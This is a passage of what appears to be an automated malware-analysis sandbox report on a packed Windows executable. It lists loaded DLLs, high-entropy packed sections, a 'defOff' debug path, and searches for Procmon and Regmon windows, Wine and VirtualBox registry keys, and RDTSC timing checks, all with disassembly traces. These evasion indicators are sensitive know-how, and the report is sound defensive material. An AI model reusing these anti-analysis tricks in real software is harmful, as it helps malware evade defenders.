              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1858560 > 1048576
              Source: file.exeStatic PE information: Raw size of hcvjgapr is bigger than: 0x100000 < 0x19c400
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1549303423.0000000008210000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1684642636.0000000006122000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hcvjgapr:EW;xbrvldyi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hcvjgapr:EW;xbrvldyi:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1d3a88 should be: 0x1ce4fd
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: hcvjgapr
              Source: file.exeStatic PE information: section name: xbrvldyi
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01196241 push es; iretd 0_3_011963CD
              Source: file.exeStatic PE information: section name: entropy: 7.979806928736388
              Source: file.exeStatic PE information: section name: hcvjgapr entropy: 7.954111183575333

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC1C9 second address: 8BC1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C22E second address: A3C269 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBF315524C9h 0x00000011 jbe 00007FBF315524B6h 0x00000017 js 00007FBF315524B6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F2C second address: A28F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F34 second address: A28F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FBF315524B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F45 second address: A28F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F49 second address: A28F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F4D second address: A28F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBF3154D246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B2BA second address: A3B2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B2BE second address: A3B309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3154D250h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e je 00007FBF3154D246h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 jmp 00007FBF3154D24Fh 0x0000001d pop edx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF3154D255h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B309 second address: A3B323 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF315524BEh 0x00000008 jp 00007FBF315524B6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FBF315524B6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B610 second address: A3B614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B614 second address: A3B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B9E9 second address: A3B9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B9F4 second address: A3BA0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BA0B second address: A3BA13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BA13 second address: A3BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FBF315524B6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BA1F second address: A3BA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D55E second address: A3D5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 39A363DAh 0x00000010 jmp 00007FBF315524C6h 0x00000015 push 00000003h 0x00000017 sub dword ptr [ebp+122D2FC5h], ecx 0x0000001d push 00000000h 0x0000001f mov edx, dword ptr [ebp+122D285Eh] 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007FBF315524B8h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 pushad 0x00000042 sbb bh, 00000000h 0x00000045 or dword ptr [ebp+122D2236h], ebx 0x0000004b popad 0x0000004c call 00007FBF315524B9h 0x00000051 jo 00007FBF315524C4h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D5E7 second address: A3D5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D5EB second address: A3D625 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBF315524C7h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF315524C6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D763 second address: A3D767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D767 second address: A3D775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D775 second address: A3D7E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D255h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 068C7E3Ch 0x00000010 call 00007FBF3154D259h 0x00000015 mov esi, 345E3500h 0x0000001a pop esi 0x0000001b clc 0x0000001c push 00000003h 0x0000001e jp 00007FBF3154D24Ch 0x00000024 xor edx, 3BED93C0h 0x0000002a push 00000000h 0x0000002c add edx, 6952EA70h 0x00000032 push 00000003h 0x00000034 jbe 00007FBF3154D24Ah 0x0000003a mov si, 69AEh 0x0000003e or dx, 96CAh 0x00000043 push 7EBD97B9h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7E6 second address: A3D7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D89F second address: A3D8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D8A3 second address: A3D8AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D9B4 second address: A3D9BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D9BA second address: A3D9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50631 second address: A50635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50635 second address: A50639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50639 second address: A50643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DE29 second address: A2DE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9EB second address: A5C9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9F0 second address: A5CA0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF315524C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CA0A second address: A5CA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CA0E second address: A5CA25 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF315524B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FBF315524C9h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DE21 second address: A2DE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CEB8 second address: A5CEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D3FE second address: A5D414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FBF3154D24Eh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D58E second address: A5D5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524C6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DD36 second address: A5DD3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DD3E second address: A5DD4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF315524BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DD4E second address: A5DD58 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF3154D246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DEFC second address: A5DF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBF315524B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DF09 second address: A5DF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DF21 second address: A5DF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF315524B6h 0x0000000a popad 0x0000000b jmp 00007FBF315524BAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A631B9 second address: A631C3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF3154D24Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64AEE second address: A64AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64AF8 second address: A64AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F1F second address: A23F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F25 second address: A23F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69463 second address: A69469 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A699CA second address: A699D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A699D0 second address: A699DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69B38 second address: A69B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3154D24Eh 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f jbe 00007FBF3154D264h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF3154D24Ch 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CC9F second address: A6CCC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FBF315524B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF315524C1h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CCC2 second address: A6CCD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF3154D24Fh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CDA5 second address: A6CE45 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF315524BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 72C1862Ch 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBF315524B8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FBF315524C1h 0x00000030 call 00007FBF315524B9h 0x00000035 pushad 0x00000036 pushad 0x00000037 push esi 0x00000038 pop esi 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 jmp 00007FBF315524C5h 0x0000004a jmp 00007FBF315524C1h 0x0000004f popad 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 jmp 00007FBF315524BDh 0x00000059 mov eax, dword ptr [eax] 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pushad 0x0000005f popad 0x00000060 pop ebx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CFF8 second address: A6CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CFFC second address: A6D006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF315524B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D006 second address: A6D00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D4B5 second address: A6D4BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5BA second address: A6D5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5BE second address: A6D5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D63E second address: A6D65E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FBF3154D24Eh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DB9A second address: A6DB9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DB9E second address: A6DBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FBF3154D248h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], ebx 0x00000012 sub dword ptr [ebp+122D2D99h], ebx 0x00000018 nop 0x00000019 jmp 00007FBF3154D257h 0x0000001e push eax 0x0000001f pushad 0x00000020 jno 00007FBF3154D24Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E099 second address: A6E09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E167 second address: A6E171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E71A second address: A6E76E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor si, 3EE6h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FBF315524B8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c je 00007FBF315524B9h 0x00000032 movsx edi, di 0x00000035 mov esi, dword ptr [ebp+122D2B0Ah] 0x0000003b mov si, A546h 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D2450h] 0x00000047 xchg eax, ebx 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E76E second address: A6E772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F72C second address: A6F732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F732 second address: A6F736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
